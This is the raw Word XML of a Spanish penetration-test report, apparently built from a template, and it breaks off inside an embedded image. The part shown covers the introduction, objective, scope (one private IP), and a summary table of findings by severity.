              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc200831441 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5CC88C03" w14:textId="6AD633FA" w:rsidR="002C5736" w:rsidRDefault="002C5736">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="0B9615B8" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="1" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CBFB7A" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc200831432"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1 INTRODUCCIÓN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077B43AD" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDFFAD9" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Durante las pruebas se simulan las actividades que realizaría un atacante real, descubriendo las vulnerabilidades, su nivel de riesgo, y generando recomendaciones que permitan al cliente realizar la remediación de estas. En cada sección de este informe se detallan los aspectos importantes de la forma en que un atacante podría utilizar la vulnerabilidad para comprometer y obtener acceso no autorizado a información sensible. Se incluyen además directrices que al ser aplicadas mejoraran los niveles de confidencialidad, integridad y disponibilidad de los sistemas analizados. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A716C0" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="522074E7" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="1" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4231A1C0" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc200831433"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1.1 OBJETIVO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051728CE" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64852972" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El objetivo de la evaluación de seguridad es detectar las vulnerabilidades de seguridad existentes en los sistemas analizados para posteriormente generar un informe con los hallazgos y recomendaciones que permitan la remediación de estas. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6393E69C" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="1" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C02D39A" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc200831434"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1.2 ALCANCE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537C881F" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B7EEA8C" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La evaluación realizada se ha centrado en los objetivos aprobados en el alcance del contrato, en el cual se establece: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF8DC2A" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="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2"/>
        <w:gridCol w:w="5759"/>
      </w:tblGrid>
      <w:tr w:rsidR="00437FF1" w14:paraId="031403C6" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="198251480"/>
          <w:trHeight w:val="478"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1055" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="191C24"/>
            <w:noWrap/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="70" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="70" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C233943" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="284" w:right="461"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5694" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="191C24"/>
            <w:noWrap/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="70" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="70" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E587882" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="284" w:right="461"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Objetivos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00437FF1" w14:paraId="0F1C2960" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="198251480"/>
          <w:trHeight w:val="478"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1055"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31E16FAA" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="284" w:right="461"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5694"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30859119" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="284" w:right="461"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">192.168.1.141 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="466C11AE" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEF16D4" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc200831435"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2 RESUMEN EJECUTIVO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014B9BF6" w14:textId="3EDF2387" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tienes que capturar pantalla de este gráfico para insertarlo dentro del Word. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="141" w:rightFromText="141" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="5765"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1874"/>
        <w:gridCol w:w="1183"/>
        <w:gridCol w:w="1441"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A21C9" w14:paraId="022C5B36" w14:textId="77777777" w:rsidTr="006A21C9">
        <w:trPr>
          <w:divId w:val="198251480"/>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000000"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0394014C" w14:textId="77777777" w:rsidR="006A21C9" w:rsidRDefault="006A21C9" w:rsidP="006A21C9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>vulnerabilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="600271FC" w14:textId="77777777" w:rsidR="006A21C9" w:rsidRDefault="006A21C9" w:rsidP="006A21C9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Cantidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58DBC549" w14:textId="77777777" w:rsidR="006A21C9" w:rsidRDefault="006A21C9" w:rsidP="006A21C9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Porcentaje</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A21C9" w14:paraId="6EFDB25D" w14:textId="77777777" w:rsidTr="006A21C9">
        <w:trPr>
          <w:divId w:val="198251480"/>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AB3EA59" w14:textId="77777777" w:rsidR="006A21C9" w:rsidRDefault="006A21C9" w:rsidP="006A21C9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Muy Alta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326054" w14:textId="77777777" w:rsidR="006A21C9" w:rsidRDefault="006A21C9" w:rsidP="006A21C9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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A65AFF" w14:textId="77777777" w:rsidR="006A21C9" w:rsidRDefault="006A21C9" w:rsidP="006A21C9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>28.6%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A21C9" w14:paraId="3030B3DB" w14:textId="77777777" w:rsidTr="006A21C9">
        <w:trPr>
          <w:divId w:val="198251480"/>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5B08FCD" w14:textId="77777777" w:rsidR="006A21C9" w:rsidRDefault="006A21C9" w:rsidP="006A21C9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Alta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89623F" w14:textId="77777777" w:rsidR="006A21C9" w:rsidRDefault="006A21C9" w:rsidP="006A21C9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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8ADC41" w14:textId="77777777" w:rsidR="006A21C9" w:rsidRDefault="006A21C9" w:rsidP="006A21C9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>57.1%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A21C9" w14:paraId="427F14FA" w14:textId="77777777" w:rsidTr="006A21C9">
        <w:trPr>
          <w:divId w:val="198251480"/>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70B757" w14:textId="77777777" w:rsidR="006A21C9" w:rsidRDefault="006A21C9" w:rsidP="006A21C9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Media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367C32" w14:textId="77777777" w:rsidR="006A21C9" w:rsidRDefault="006A21C9" w:rsidP="006A21C9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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4739BF" w14:textId="77777777" w:rsidR="006A21C9" w:rsidRDefault="006A21C9" w:rsidP="006A21C9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>14.3%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A21C9" w14:paraId="3046DEB3" w14:textId="77777777" w:rsidTr="006A21C9">
        <w:trPr>
          <w:divId w:val="198251480"/>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0548454" w14:textId="77777777" w:rsidR="006A21C9" w:rsidRDefault="006A21C9" w:rsidP="006A21C9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Baja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654542" w14:textId="77777777" w:rsidR="006A21C9" w:rsidRDefault="006A21C9" w:rsidP="006A21C9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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1EDE66" w14:textId="77777777" w:rsidR="006A21C9" w:rsidRDefault="006A21C9" w:rsidP="006A21C9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CAAD0C8" w14:textId="721C470A" w:rsidR="00437FF1" w:rsidRDefault="006A21C9" w:rsidP="006A21C9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A21C9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41DE42F8" wp14:editId="62A760FD">
            <wp:extent cx="3771900" cy="2919122"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="444754448"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54448" name="Imagen 1" descr="Gráfico&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
